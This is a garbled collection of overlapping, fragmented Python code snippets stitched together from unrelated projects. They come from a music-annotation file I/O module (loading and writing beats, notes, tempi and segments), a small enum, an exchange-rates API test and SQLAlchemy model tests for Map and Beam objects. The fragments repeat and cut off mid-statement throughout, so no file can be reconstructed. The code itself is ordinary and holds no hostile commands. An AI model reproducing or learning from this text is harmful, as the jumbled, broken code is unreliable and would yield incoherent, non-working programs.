\"\"\" with open_file(filename) as", "string = fmt % e f.write(bytes((string + '\\n').encode(ENCODING))) f.flush() load_onsets = load_events write_onsets", "rest is ignored return events[:, 0] def write_events(events, filename, fmt='%.3f', delimiter='\\t', header=None): \"\"\"", "------- numpy array Downbeats. \"\"\" return load_beats(filename, downbeats=True) def write_downbeats(beats, filename, fmt=None, delimiter='\\t',", "is not None: f.write(bytes(('# ' + header + '\\n').encode(ENCODING))) # write events for", "output out = np.array([t1, t2, strength], ndmin=2) write_events(out, filename, fmt=['%.2f', '%.2f', '%.2f'], delimiter=delimiter,", "# read in the events, one per line events = np.loadtxt(filename, ndmin=2) #", "['%.3f', '%d', '%.3f', '%d'] if not notes.ndim == 2: raise ValueError('unknown format for", "= beats[beats[:, 1] == 1][:, 0] if fmt is None: fmt = '%.3f'", "np.loadtxt(filename, ndmin=1) # split the filename according to their filename into tempi and", "(handle) to open. mode: {'r', 'w'} Specifies the mode in which the file", "float The most dominant tempo. tempo_2 : float The second most dominant tempo.", "a file. Parameters ---------- beats : numpy array Beats or downbeats to be", "file if isinstance(filename, string_types): f = fid = _io.open(filename, mode) else: f =", "%d', in which case `delimiter` is ignored. delimiter : str, optional String or", "delimiter=delimiter, header=header) load_chords = load_segments write_chords = write_segments def load_key(filename): \"\"\" Load the", "will be written at the beginning of the file as comment. Notes -----", "= np.zeros(len(start), dtype=SEGMENT_DTYPE) segments['start'] = start segments['end'] = end segments['label'] = label return", "beat per line of format 'beat_time' ['beat_number']. Parameters ---------- filename : str or", "> split_value] strengths = values[values <= split_value] # make the strengths behave properly", "only the times of those beats with a beat number of 1). 
\"\"\"", "if len(tempi) - len(strengths) == 1: strengths = np.append(strengths, 1. - strength_sum) if", "array, shape (num_tempi[, 2]) Array with tempi. If no strength is parsed, a", "length if len(tempi) != len(strengths): raise AssertionError('tempi and strengths must have same length')", "A sequence of formats (e.g. ['%.3f', '%d', '%.3f', '%d']), or a multi-format string,", "of colums given fmt = delimiter.join(fmt[:notes.shape[1]]) # write the notes write_events(notes, filename, fmt=fmt,", "1][:, 0] else: # 1st column is the beat time, the rest is", "array tempi = np.array(tempi, ndmin=2) # default values t1 = t2 = strength", "str or file handle File (handle) to open. mode: {'r', 'w'} Specifies the", "no strength is parsed, a 1-dimensional array of length 'num_tempi' is returned. If", "= _io.open(filename, mode) else: f = filename fid = None # yield an", "tuple(e.tolist()) except AttributeError: string = e except TypeError: string = fmt % e", "file as comment. Notes ----- If `beats` contains both time and number of", "the most dominant tempi and the relative strength to a file. Parameters ----------", "if np.any(strengths < 0): raise AssertionError('strengths must be positive') # no strength is", "tempi according to their strengths if sort: import warnings warnings.warn('`sort` is deprecated as", "\"\"\" Context manager which yields an open file or handle with the given", "must have same length if len(tempi) != len(strengths): raise AssertionError('tempi and strengths must", "the given file, one note per line of format 'onset_time' 'note_number' ['duration' ['velocity']].", "be a single string if needed if isinstance(fmt, (list, tuple)): fmt = delimiter.join(fmt)", "fmt : str or sequence of strs, optional A single format (e.g. '%.3f'),", "Write the notes to a file. 
Parameters ---------- notes : numpy array, shape", "a better solution tempi = values[values > split_value] strengths = values[values <= split_value]", "# consider only the two strongest tempi and strengths elif len(tempi) > 1:", "better solution tempi = values[values > split_value] strengths = values[values <= split_value] #", "yield an open file handle yield f # close the file if needed", ": str or sequence of strs, optional A sequence of formats (e.g. ['%.3f',", "['secondary tempo' ['relative_strength']] Parameters ---------- filename : str or file handle File to", "note per line of format 'onset_time' 'note_number' ['duration' ['velocity']]. Parameters ---------- filename: str", "multi-format string (e.g. '%.3f %.3f'), in which case `delimiter` is ignored. delimiter :", "beginning of the file as comment. Returns ------- numpy array Notes. \"\"\" #", "and <label> is a string. Parameters ---------- filename : str or file handle", "to keep their order sort_idx = (-strengths).argsort(kind='mergesort') tempi = tempi[sort_idx] strengths = strengths[sort_idx]", "Labelled segments are represented as numpy structured array with three named columns: 'start'", "@contextlib.contextmanager def open_file(filename, mode='r'): \"\"\" Context manager which yields an open file or", "write_events(beats, filename, fmt, delimiter, header) def load_downbeats(filename): \"\"\" Load the downbeats from the", "format as a numpy array and write to output out = np.array([t1, t2,", "find a better solution tempi = values[values > split_value] strengths = values[values <=" ]
[ "class Side(Enum): Left = 0 Up = 1 Right = 2 Down =", "Enum class Side(Enum): Left = 0 Up = 1 Right = 2 Down", "Side(Enum): Left = 0 Up = 1 Right = 2 Down = 3", "import Enum class Side(Enum): Left = 0 Up = 1 Right = 2", "<reponame>paldynaagata/plumber from enum import Enum class Side(Enum): Left = 0 Up = 1", "enum import Enum class Side(Enum): Left = 0 Up = 1 Right =", "from enum import Enum class Side(Enum): Left = 0 Up = 1 Right" ]
[ "'PHP', 'HKD'] response = exchange_rates_api.get(date(2020, 1, 1), base='USD', symbols=symbols) assert set(response.keys()) == {'rates',", "= ['EUR', 'PHP', 'HKD'] start_at = date(2020, 1, 2) end_at = date(2020, 1,", "date(2020, 1, 3) response = exchange_rates_api.get_history( start_at=start_at, end_at=end_at, base='USD', symbols=symbols, ) print(response) assert", "2) end_at = date(2020, 1, 3) response = exchange_rates_api.get_history( start_at=start_at, end_at=end_at, base='USD', symbols=symbols,", "exchange_rates_api.get_history( start_at=start_at, end_at=end_at, base='USD', symbols=symbols, ) print(response) assert set(response.keys()) == {'rates', 'start_at', 'end_at',", "{'rates', 'start_at', 'end_at', 'base'} assert set(response['rates'].keys()) == {start_at.isoformat(), end_at.isoformat()} for k, v in", "= exchange_rates_api.get(date(2020, 1, 1), base='USD', symbols=symbols) assert set(response.keys()) == {'rates', 'date', 'base'} assert", "assert set(response['rates'].keys()) == set(symbols) def test_xr_get_history(): symbols = ['EUR', 'PHP', 'HKD'] start_at =", "symbols = ['EUR', 'PHP', 'HKD'] start_at = date(2020, 1, 2) end_at = date(2020,", "response = exchange_rates_api.get(date(2020, 1, 1), base='USD', symbols=symbols) assert set(response.keys()) == {'rates', 'date', 'base'}", "1), base='USD', symbols=symbols) assert set(response.keys()) == {'rates', 'date', 'base'} assert set(response['rates'].keys()) == set(symbols)", "= ['EUR', 'PHP', 'HKD'] response = exchange_rates_api.get(date(2020, 1, 1), base='USD', symbols=symbols) assert set(response.keys())", "def test_xr_get(): symbols = ['EUR', 'PHP', 'HKD'] response = exchange_rates_api.get(date(2020, 1, 1), base='USD',", "date(2020, 1, 2) end_at = date(2020, 1, 3) response = exchange_rates_api.get_history( start_at=start_at, end_at=end_at,", "symbols = ['EUR', 'PHP', 'HKD'] response = exchange_rates_api.get(date(2020, 1, 1), base='USD', symbols=symbols) assert", "= date(2020, 1, 3) response = 
exchange_rates_api.get_history( start_at=start_at, end_at=end_at, base='USD', symbols=symbols, ) print(response)", "response = exchange_rates_api.get_history( start_at=start_at, end_at=end_at, base='USD', symbols=symbols, ) print(response) assert set(response.keys()) == {'rates',", "= exchange_rates_api.get_history( start_at=start_at, end_at=end_at, base='USD', symbols=symbols, ) print(response) assert set(response.keys()) == {'rates', 'start_at',", "== {'rates', 'start_at', 'end_at', 'base'} assert set(response['rates'].keys()) == {start_at.isoformat(), end_at.isoformat()} for k, v", "<filename>typhoon/examples/airflow_docker/src/tests/integration/exchange_rates_api_test.py<gh_stars>10-100 from datetime import date from functions import exchange_rates_api def test_xr_get(): symbols =", "['EUR', 'PHP', 'HKD'] response = exchange_rates_api.get(date(2020, 1, 1), base='USD', symbols=symbols) assert set(response.keys()) ==", "base='USD', symbols=symbols) assert set(response.keys()) == {'rates', 'date', 'base'} assert set(response['rates'].keys()) == set(symbols) def", "1, 3) response = exchange_rates_api.get_history( start_at=start_at, end_at=end_at, base='USD', symbols=symbols, ) print(response) assert set(response.keys())", "== {'rates', 'date', 'base'} assert set(response['rates'].keys()) == set(symbols) def test_xr_get_history(): symbols = ['EUR',", "= date(2020, 1, 2) end_at = date(2020, 1, 3) response = exchange_rates_api.get_history( start_at=start_at,", "3) response = exchange_rates_api.get_history( start_at=start_at, end_at=end_at, base='USD', symbols=symbols, ) print(response) assert set(response.keys()) ==", "datetime import date from functions import exchange_rates_api def test_xr_get(): symbols = ['EUR', 'PHP',", "exchange_rates_api def test_xr_get(): symbols = ['EUR', 'PHP', 'HKD'] response = exchange_rates_api.get(date(2020, 1, 1),", "import date from functions import exchange_rates_api def test_xr_get(): symbols = ['EUR', 'PHP', 'HKD']", 
"set(response.keys()) == {'rates', 'start_at', 'end_at', 'base'} assert set(response['rates'].keys()) == {start_at.isoformat(), end_at.isoformat()} for k,", "from functions import exchange_rates_api def test_xr_get(): symbols = ['EUR', 'PHP', 'HKD'] response =", "end_at = date(2020, 1, 3) response = exchange_rates_api.get_history( start_at=start_at, end_at=end_at, base='USD', symbols=symbols, )", "set(response.keys()) == {'rates', 'date', 'base'} assert set(response['rates'].keys()) == set(symbols) def test_xr_get_history(): symbols =", "'base'} assert set(response['rates'].keys()) == {start_at.isoformat(), end_at.isoformat()} for k, v in response['rates'].items(): assert set(v.keys())", "1, 2) end_at = date(2020, 1, 3) response = exchange_rates_api.get_history( start_at=start_at, end_at=end_at, base='USD',", "set(symbols) def test_xr_get_history(): symbols = ['EUR', 'PHP', 'HKD'] start_at = date(2020, 1, 2)", "== set(symbols) def test_xr_get_history(): symbols = ['EUR', 'PHP', 'HKD'] start_at = date(2020, 1,", "{'rates', 'date', 'base'} assert set(response['rates'].keys()) == set(symbols) def test_xr_get_history(): symbols = ['EUR', 'PHP',", "set(response['rates'].keys()) == set(symbols) def test_xr_get_history(): symbols = ['EUR', 'PHP', 'HKD'] start_at = date(2020,", "def test_xr_get_history(): symbols = ['EUR', 'PHP', 'HKD'] start_at = date(2020, 1, 2) end_at", "1, 1), base='USD', symbols=symbols) assert set(response.keys()) == {'rates', 'date', 'base'} assert set(response['rates'].keys()) ==", "'HKD'] start_at = date(2020, 1, 2) end_at = date(2020, 1, 3) response =", "start_at = date(2020, 1, 2) end_at = date(2020, 1, 3) response = exchange_rates_api.get_history(", "'start_at', 'end_at', 'base'} assert set(response['rates'].keys()) == {start_at.isoformat(), end_at.isoformat()} for k, v in response['rates'].items():", "'PHP', 'HKD'] start_at = date(2020, 1, 2) end_at = date(2020, 1, 3) response", "'HKD'] response = exchange_rates_api.get(date(2020, 1, 1), 
base='USD', symbols=symbols) assert set(response.keys()) == {'rates', 'date',", "test_xr_get(): symbols = ['EUR', 'PHP', 'HKD'] response = exchange_rates_api.get(date(2020, 1, 1), base='USD', symbols=symbols)", "end_at=end_at, base='USD', symbols=symbols, ) print(response) assert set(response.keys()) == {'rates', 'start_at', 'end_at', 'base'} assert", "from datetime import date from functions import exchange_rates_api def test_xr_get(): symbols = ['EUR',", "symbols=symbols) assert set(response.keys()) == {'rates', 'date', 'base'} assert set(response['rates'].keys()) == set(symbols) def test_xr_get_history():", "symbols=symbols, ) print(response) assert set(response.keys()) == {'rates', 'start_at', 'end_at', 'base'} assert set(response['rates'].keys()) ==", "print(response) assert set(response.keys()) == {'rates', 'start_at', 'end_at', 'base'} assert set(response['rates'].keys()) == {start_at.isoformat(), end_at.isoformat()}", "assert set(response.keys()) == {'rates', 'start_at', 'end_at', 'base'} assert set(response['rates'].keys()) == {start_at.isoformat(), end_at.isoformat()} for", "'end_at', 'base'} assert set(response['rates'].keys()) == {start_at.isoformat(), end_at.isoformat()} for k, v in response['rates'].items(): assert", "set(response['rates'].keys()) == {start_at.isoformat(), end_at.isoformat()} for k, v in response['rates'].items(): assert set(v.keys()) == set(symbols)", "date from functions import exchange_rates_api def test_xr_get(): symbols = ['EUR', 'PHP', 'HKD'] response", "['EUR', 'PHP', 'HKD'] start_at = date(2020, 1, 2) end_at = date(2020, 1, 3)", "'base'} assert set(response['rates'].keys()) == set(symbols) def test_xr_get_history(): symbols = ['EUR', 'PHP', 'HKD'] start_at", "exchange_rates_api.get(date(2020, 1, 1), base='USD', symbols=symbols) assert set(response.keys()) == {'rates', 'date', 'base'} assert set(response['rates'].keys())", "start_at=start_at, end_at=end_at, base='USD', symbols=symbols, ) print(response) assert 
set(response.keys()) == {'rates', 'start_at', 'end_at', 'base'}", "base='USD', symbols=symbols, ) print(response) assert set(response.keys()) == {'rates', 'start_at', 'end_at', 'base'} assert set(response['rates'].keys())", ") print(response) assert set(response.keys()) == {'rates', 'start_at', 'end_at', 'base'} assert set(response['rates'].keys()) == {start_at.isoformat(),", "import exchange_rates_api def test_xr_get(): symbols = ['EUR', 'PHP', 'HKD'] response = exchange_rates_api.get(date(2020, 1,", "assert set(response['rates'].keys()) == {start_at.isoformat(), end_at.isoformat()} for k, v in response['rates'].items(): assert set(v.keys()) ==", "assert set(response.keys()) == {'rates', 'date', 'base'} assert set(response['rates'].keys()) == set(symbols) def test_xr_get_history(): symbols", "test_xr_get_history(): symbols = ['EUR', 'PHP', 'HKD'] start_at = date(2020, 1, 2) end_at =", "functions import exchange_rates_api def test_xr_get(): symbols = ['EUR', 'PHP', 'HKD'] response = exchange_rates_api.get(date(2020,", "'date', 'base'} assert set(response['rates'].keys()) == set(symbols) def test_xr_get_history(): symbols = ['EUR', 'PHP', 'HKD']" ]
[ "app.app_context(): # test the number of the maps is increased by one assert", "test_relation(app): '''A simple test of adding an object with relation ''' map1 =", "= Map.query.filter_by(name='map1').first() # the query returns the same Python object assert map1 is", "initial number of the maps to compare later nmaps = len(Map.query.all()) # this", "beam1.input_map_id is None with app.app_context(): sa.session.add(map1) sa.session.commit() # The primary keys are assigned", "is None with app.app_context(): sa.session.add(map1) sa.session.commit() # The primary keys are assigned assert", "map1.name # __________________________________________________________________|| def test_relation(app): '''A simple test of adding an object with", "map1.map_id is None assert beam1.beam_id is None assert beam1.input_map_id is None with app.app_context():", "assert map1 is map1_ with app.app_context(): map1_ = Map.query.filter_by(name='map1').first() # In a different", "primarily for the developer to understand # how models in flask_sqlalchemy work. #", "simple test about Python object ''' map1 = Map(name=\"map1\") with app.app_context(): sa.session.add(map1) sa.session.commit()", "__________________________________________________________________|| def test_simple(app): '''A simple test of adding an object ''' with app.app_context():", "acondbs.models import Map, Beam # These tests are written primarily for the developer", "assert map1.map_id is None with app.app_context(): sa.session.add(map1) sa.session.commit() # After the commit, map_id", "work. 
# __________________________________________________________________|| def test_simple(app): '''A simple test of adding an object '''", "== map1.name # __________________________________________________________________|| def test_relation(app): '''A simple test of adding an object", "Beam.query.filter_by(name='beam1').first() # The relation is preserved in a different app context assert map1", "test_simple(app): '''A simple test of adding an object ''' with app.app_context(): # save", "in another context map1 = Map.query.filter_by(map_id=map_id).first() assert 'map1' == map1.name # __________________________________________________________________|| def", "beam1.beam_id is not None # The foreign key is correctly set assert map1.map_id", "relation has been already established assert map1 is beam1.map assert [beam1] == map1.beams", "assert 'map1' == map1.name # __________________________________________________________________|| def test_relation(app): '''A simple test of adding", "is correctly set assert map1.map_id == beam1.input_map_id with app.app_context(): map1 = Map.query.filter_by(name='map1').first() beam1", "understand # how models in flask_sqlalchemy work. 
# __________________________________________________________________|| def test_simple(app): '''A simple", "map1 is not map1_ # __________________________________________________________________|| def test_primary_key(app): '''A simple test about the", "Map.query.filter_by(map_id=map_id).first() assert 'map1' == map1.name # __________________________________________________________________|| def test_relation(app): '''A simple test of", "Map(name=\"map1\") with app.app_context(): sa.session.add(map1) sa.session.commit() map1_ = Map.query.filter_by(name='map1').first() # the query returns the", "# The relation is preserved in a different app context assert map1 is", "map1.map_id is not None assert beam1.beam_id is not None # The foreign key", "the new map can be retrieved in a different app context map1_ =", "this instantiation doesn't need be within a app context map1 = Map(name=\"map1\") with", "sa.session.commit() with app.app_context(): # test the number of the maps is increased by", "by one assert (nmaps + 1) == len(Map.query.all()) # the new map can", "'''A simple test about the primary key ''' map1 = Map(name=\"map1\") # The", "# this instantiation doesn't need be within a app context map1 = Map(name=\"map1\")", "for the developer to understand # how models in flask_sqlalchemy work. 
# __________________________________________________________________||", "assert (nmaps + 1) == len(Map.query.all()) # the new map can be retrieved", "context map1 = Map.query.filter_by(map_id=map_id).first() assert 'map1' == map1.name # __________________________________________________________________|| def test_relation(app): '''A", "= Beam.query.filter_by(name='beam1').first() # The relation is preserved in a different app context assert", "the number of the maps is increased by one assert (nmaps + 1)", "assert beam1.input_map_id is None with app.app_context(): sa.session.add(map1) sa.session.commit() # The primary keys are", "written primarily for the developer to understand # how models in flask_sqlalchemy work.", "the same Python object assert map1 is map1_ with app.app_context(): map1_ = Map.query.filter_by(name='map1').first()", "# The primary key (map_id) is None at this point assert map1.map_id is", "+ 1) == len(Map.query.all()) # the new map can be retrieved in a", "map1 is beam1.map assert beam1 is map1.beams[0] assert map1.map_id == beam1.input_map_id # __________________________________________________________________||", "with app.app_context(): sa.session.add(map1) sa.session.commit() with app.app_context(): # test the number of the maps", "Map.query.filter_by(name='map1').first() # In a different app context, no longer the same Python object", "# In a different app context, no longer the same Python object assert", "an object with relation ''' map1 = Map(name=\"map1\") beam1 = Beam(name=\"beam1\", map=map1) #", "keys are assigned assert map1.map_id is not None assert beam1.beam_id is not None", "about Python object ''' map1 = Map(name=\"map1\") with app.app_context(): sa.session.add(map1) sa.session.commit() map1_ =", "context map1 = Map(name=\"map1\") with app.app_context(): sa.session.add(map1) sa.session.commit() with app.app_context(): # test the", "not map1_ # __________________________________________________________________|| def 
test_primary_key(app): '''A simple test about the primary key", "is increased by one assert (nmaps + 1) == len(Map.query.all()) # the new", "is not None assert beam1.beam_id is not None # The foreign key is", "relation is preserved in a different app context assert map1 is beam1.map assert", "app.app_context(): map1 = Map.query.filter_by(name='map1').first() beam1 = Beam.query.filter_by(name='beam1').first() # The relation is preserved in", "nmaps = len(Map.query.all()) # this instantiation doesn't need be within a app context", "# __________________________________________________________________|| def test_python_object(app): '''A simple test about Python object ''' map1 =", "Map(name=\"map1\") with app.app_context(): sa.session.add(map1) sa.session.commit() with app.app_context(): # test the number of the", "simple test of adding an object ''' with app.app_context(): # save the initial", "# __________________________________________________________________|| def test_simple(app): '''A simple test of adding an object ''' with", "assert map1 is beam1.map assert beam1 is map1.beams[0] assert map1.map_id == beam1.input_map_id #", "map_id is not None with app.app_context(): # The object can be retrived by", "The relation has been already established assert map1 is beam1.map assert [beam1] ==", "from acondbs.db.sa import sa from acondbs.models import Map, Beam # These tests are", "of the maps to compare later nmaps = len(Map.query.all()) # this instantiation doesn't", "map1.map_id assert map_id is not None with app.app_context(): # The object can be", "# The primary and foreign keys are still None assert map1.map_id is None", "map1_ = Map.query.filter_by(name='map1').first() # the query returns the same Python object assert map1", "adding an object with relation ''' map1 = Map(name=\"map1\") beam1 = Beam(name=\"beam1\", map=map1)", "established assert map1 is beam1.map assert [beam1] == map1.beams # The primary and", "the maps to compare later nmaps = 
len(Map.query.all()) # this instantiation doesn't need", "def test_relation(app): '''A simple test of adding an object with relation ''' map1", "to understand # how models in flask_sqlalchemy work. # __________________________________________________________________|| def test_simple(app): '''A", "assert map_id is not None with app.app_context(): # The object can be retrived", "simple test of adding an object with relation ''' map1 = Map(name=\"map1\") beam1", "map_id = map1.map_id assert map_id is not None with app.app_context(): # The object", "1) == len(Map.query.all()) # the new map can be retrieved in a different", "None assert beam1.beam_id is None assert beam1.input_map_id is None with app.app_context(): sa.session.add(map1) sa.session.commit()", "test_primary_key(app): '''A simple test about the primary key ''' map1 = Map(name=\"map1\") #", "assigned assert map1.map_id is not None assert beam1.beam_id is not None # The", "'map1' == map1.name # __________________________________________________________________|| def test_relation(app): '''A simple test of adding an", "map1_ = Map.query.filter_by(name='map1').first() assert isinstance(map1_, Map) # __________________________________________________________________|| def test_python_object(app): '''A simple test", "maps is increased by one assert (nmaps + 1) == len(Map.query.all()) # the", "'''A simple test of adding an object ''' with app.app_context(): # save the", "is not None with app.app_context(): # The object can be retrived by the", "map1 = Map.query.filter_by(map_id=map_id).first() assert 'map1' == map1.name # __________________________________________________________________|| def test_relation(app): '''A simple", "= Map.query.filter_by(name='map1').first() beam1 = Beam.query.filter_by(name='beam1').first() # The relation is preserved in a different", "foreign keys are still None assert map1.map_id is None assert beam1.beam_id is None", "len(Map.query.all()) # this instantiation doesn't need be 
within a app context map1 =", "app.app_context(): sa.session.add(map1) sa.session.commit() # After the commit, map_id is automatically assigned map_id =", "= Map.query.filter_by(map_id=map_id).first() assert 'map1' == map1.name # __________________________________________________________________|| def test_relation(app): '''A simple test", "test_python_object(app): '''A simple test about Python object ''' map1 = Map(name=\"map1\") with app.app_context():", "app.app_context(): # save the initial number of the maps to compare later nmaps", "with app.app_context(): # test the number of the maps is increased by one", "different app context, no longer the same Python object assert map1 is not", "app context assert map1 is beam1.map assert beam1 is map1.beams[0] assert map1.map_id ==", "beam1 = Beam(name=\"beam1\", map=map1) # The relation has been already established assert map1", "with app.app_context(): sa.session.add(map1) sa.session.commit() # After the commit, map_id is automatically assigned map_id", "different app context assert map1 is beam1.map assert beam1 is map1.beams[0] assert map1.map_id", "# save the initial number of the maps to compare later nmaps =", "primary keys are assigned assert map1.map_id is not None assert beam1.beam_id is not", "object with relation ''' map1 = Map(name=\"map1\") beam1 = Beam(name=\"beam1\", map=map1) # The", "== map1.beams # The primary and foreign keys are still None assert map1.map_id", "models in flask_sqlalchemy work. 
# __________________________________________________________________|| def test_simple(app): '''A simple test of adding", "def test_simple(app): '''A simple test of adding an object ''' with app.app_context(): #", "Map.query.filter_by(name='map1').first() assert isinstance(map1_, Map) # __________________________________________________________________|| def test_python_object(app): '''A simple test about Python", "# The primary keys are assigned assert map1.map_id is not None assert beam1.beam_id", "sa.session.add(map1) sa.session.commit() # The primary keys are assigned assert map1.map_id is not None", "isinstance(map1_, Map) # __________________________________________________________________|| def test_python_object(app): '''A simple test about Python object '''", "sa.session.commit() # After the commit, map_id is automatically assigned map_id = map1.map_id assert", "app context map1 = Map(name=\"map1\") with app.app_context(): sa.session.add(map1) sa.session.commit() with app.app_context(): # test", "After the commit, map_id is automatically assigned map_id = map1.map_id assert map_id is", "map can be retrieved in a different app context map1_ = Map.query.filter_by(name='map1').first() assert", "test of adding an object with relation ''' map1 = Map(name=\"map1\") beam1 =", "is not map1_ # __________________________________________________________________|| def test_primary_key(app): '''A simple test about the primary", "are still None assert map1.map_id is None assert beam1.beam_id is None assert beam1.input_map_id", "map1 = Map.query.filter_by(name='map1').first() beam1 = Beam.query.filter_by(name='beam1').first() # The relation is preserved in a", "number of the maps is increased by one assert (nmaps + 1) ==", "returns the same Python object assert map1 is map1_ with app.app_context(): map1_ =", "= Map.query.filter_by(name='map1').first() # In a different app context, no longer the same Python", "at this point assert map1.map_id is None with 
app.app_context(): sa.session.add(map1) sa.session.commit() # After", "acondbs.db.sa import sa from acondbs.models import Map, Beam # These tests are written", "map1_ with app.app_context(): map1_ = Map.query.filter_by(name='map1').first() # In a different app context, no", "Python object assert map1 is not map1_ # __________________________________________________________________|| def test_primary_key(app): '''A simple", "map_id is automatically assigned map_id = map1.map_id assert map_id is not None with", "test about the primary key ''' map1 = Map(name=\"map1\") # The primary key", "object ''' map1 = Map(name=\"map1\") with app.app_context(): sa.session.add(map1) sa.session.commit() map1_ = Map.query.filter_by(name='map1').first() #", "len(Map.query.all()) # the new map can be retrieved in a different app context", "the initial number of the maps to compare later nmaps = len(Map.query.all()) #", "increased by one assert (nmaps + 1) == len(Map.query.all()) # the new map", "beam1 = Beam.query.filter_by(name='beam1').first() # The relation is preserved in a different app context", "None with app.app_context(): sa.session.add(map1) sa.session.commit() # After the commit, map_id is automatically assigned", "maps to compare later nmaps = len(Map.query.all()) # this instantiation doesn't need be", "= Map.query.filter_by(name='map1').first() assert isinstance(map1_, Map) # __________________________________________________________________|| def test_python_object(app): '''A simple test about", "None # The foreign key is correctly set assert map1.map_id == beam1.input_map_id with", "object assert map1 is map1_ with app.app_context(): map1_ = Map.query.filter_by(name='map1').first() # In a", "Map.query.filter_by(name='map1').first() # the query returns the same Python object assert map1 is map1_", "== len(Map.query.all()) # the new map can be retrieved in a different app", "assigned map_id = map1.map_id assert map_id is not None with app.app_context(): # The", "# test 
the number of the maps is increased by one assert (nmaps", "test the number of the maps is increased by one assert (nmaps +", "the maps is increased by one assert (nmaps + 1) == len(Map.query.all()) #", "assert map1 is not map1_ # __________________________________________________________________|| def test_primary_key(app): '''A simple test about", "different app context map1_ = Map.query.filter_by(name='map1').first() assert isinstance(map1_, Map) # __________________________________________________________________|| def test_python_object(app):", "point assert map1.map_id is None with app.app_context(): sa.session.add(map1) sa.session.commit() # After the commit,", "the map_id in another context map1 = Map.query.filter_by(map_id=map_id).first() assert 'map1' == map1.name #", "# __________________________________________________________________|| def test_primary_key(app): '''A simple test about the primary key ''' map1", "the query returns the same Python object assert map1 is map1_ with app.app_context():", "'''A simple test about Python object ''' map1 = Map(name=\"map1\") with app.app_context(): sa.session.add(map1)", "automatically assigned map_id = map1.map_id assert map_id is not None with app.app_context(): #", "sa.session.commit() map1_ = Map.query.filter_by(name='map1').first() # the query returns the same Python object assert", "Map, Beam # These tests are written primarily for the developer to understand", "Map.query.filter_by(name='map1').first() beam1 = Beam.query.filter_by(name='beam1').first() # The relation is preserved in a different app", "with app.app_context(): sa.session.add(map1) sa.session.commit() map1_ = Map.query.filter_by(name='map1').first() # the query returns the same", "developer to understand # how models in flask_sqlalchemy work. 
# __________________________________________________________________|| def test_simple(app):", "about the primary key ''' map1 = Map(name=\"map1\") # The primary key (map_id)", "The primary and foreign keys are still None assert map1.map_id is None assert", "# how models in flask_sqlalchemy work. # __________________________________________________________________|| def test_simple(app): '''A simple test", "object assert map1 is not map1_ # __________________________________________________________________|| def test_primary_key(app): '''A simple test", "the same Python object assert map1 is not map1_ # __________________________________________________________________|| def test_primary_key(app):", "this point assert map1.map_id is None with app.app_context(): sa.session.add(map1) sa.session.commit() # After the", "def test_python_object(app): '''A simple test about Python object ''' map1 = Map(name=\"map1\") with", "can be retrieved in a different app context map1_ = Map.query.filter_by(name='map1').first() assert isinstance(map1_,", "beam1.input_map_id with app.app_context(): map1 = Map.query.filter_by(name='map1').first() beam1 = Beam.query.filter_by(name='beam1').first() # The relation is", "In a different app context, no longer the same Python object assert map1", "The foreign key is correctly set assert map1.map_id == beam1.input_map_id with app.app_context(): map1", "map1 = Map(name=\"map1\") with app.app_context(): sa.session.add(map1) sa.session.commit() with app.app_context(): # test the number", "of the maps is increased by one assert (nmaps + 1) == len(Map.query.all())", "The relation is preserved in a different app context assert map1 is beam1.map", "''' map1 = Map(name=\"map1\") # The primary key (map_id) is None at this", "no longer the same Python object assert map1 is not map1_ # __________________________________________________________________||", "doesn't need be within a app context map1 = Map(name=\"map1\") with app.app_context(): 
sa.session.add(map1)", "# The relation has been already established assert map1 is beam1.map assert [beam1]", "already established assert map1 is beam1.map assert [beam1] == map1.beams # The primary", "query returns the same Python object assert map1 is map1_ with app.app_context(): map1_", "Map(name=\"map1\") beam1 = Beam(name=\"beam1\", map=map1) # The relation has been already established assert", "is map1_ with app.app_context(): map1_ = Map.query.filter_by(name='map1').first() # In a different app context,", "be within a app context map1 = Map(name=\"map1\") with app.app_context(): sa.session.add(map1) sa.session.commit() with", "object can be retrived by the map_id in another context map1 = Map.query.filter_by(map_id=map_id).first()", "is automatically assigned map_id = map1.map_id assert map_id is not None with app.app_context():", "assert map1.map_id is None assert beam1.beam_id is None assert beam1.input_map_id is None with", "to compare later nmaps = len(Map.query.all()) # this instantiation doesn't need be within", "test about Python object ''' map1 = Map(name=\"map1\") with app.app_context(): sa.session.add(map1) sa.session.commit() map1_", "assert beam1.beam_id is None assert beam1.input_map_id is None with app.app_context(): sa.session.add(map1) sa.session.commit() #", "compare later nmaps = len(Map.query.all()) # this instantiation doesn't need be within a", "__________________________________________________________________|| def test_python_object(app): '''A simple test about Python object ''' map1 = Map(name=\"map1\")", "instantiation doesn't need be within a app context map1 = Map(name=\"map1\") with app.app_context():", "of adding an object ''' with app.app_context(): # save the initial number of", "Beam # These tests are written primarily for the developer to understand #", "app context, no longer the same Python object assert map1 is not map1_", "app.app_context(): sa.session.add(map1) sa.session.commit() # The primary keys are assigned assert 
map1.map_id is not", "context, no longer the same Python object assert map1 is not map1_ #", "map1 is beam1.map assert [beam1] == map1.beams # The primary and foreign keys", "# the query returns the same Python object assert map1 is map1_ with", "== beam1.input_map_id with app.app_context(): map1 = Map.query.filter_by(name='map1').first() beam1 = Beam.query.filter_by(name='beam1').first() # The relation", "been already established assert map1 is beam1.map assert [beam1] == map1.beams # The", "are assigned assert map1.map_id is not None assert beam1.beam_id is not None #", "correctly set assert map1.map_id == beam1.input_map_id with app.app_context(): map1 = Map.query.filter_by(name='map1').first() beam1 =", "beam1.map assert [beam1] == map1.beams # The primary and foreign keys are still", "is not None # The foreign key is correctly set assert map1.map_id ==", "with app.app_context(): # save the initial number of the maps to compare later", "with app.app_context(): map1 = Map.query.filter_by(name='map1').first() beam1 = Beam.query.filter_by(name='beam1').first() # The relation is preserved", "map1_ # __________________________________________________________________|| def test_primary_key(app): '''A simple test about the primary key '''", "assert [beam1] == map1.beams # The primary and foreign keys are still None", "a different app context, no longer the same Python object assert map1 is", "later nmaps = len(Map.query.all()) # this instantiation doesn't need be within a app", "= Map(name=\"map1\") beam1 = Beam(name=\"beam1\", map=map1) # The relation has been already established", "of adding an object with relation ''' map1 = Map(name=\"map1\") beam1 = Beam(name=\"beam1\",", "a app context map1 = Map(name=\"map1\") with app.app_context(): sa.session.add(map1) sa.session.commit() with app.app_context(): #", "These tests are written primarily for the developer to understand # how models", "number of the maps to compare later nmaps = len(Map.query.all()) # this 
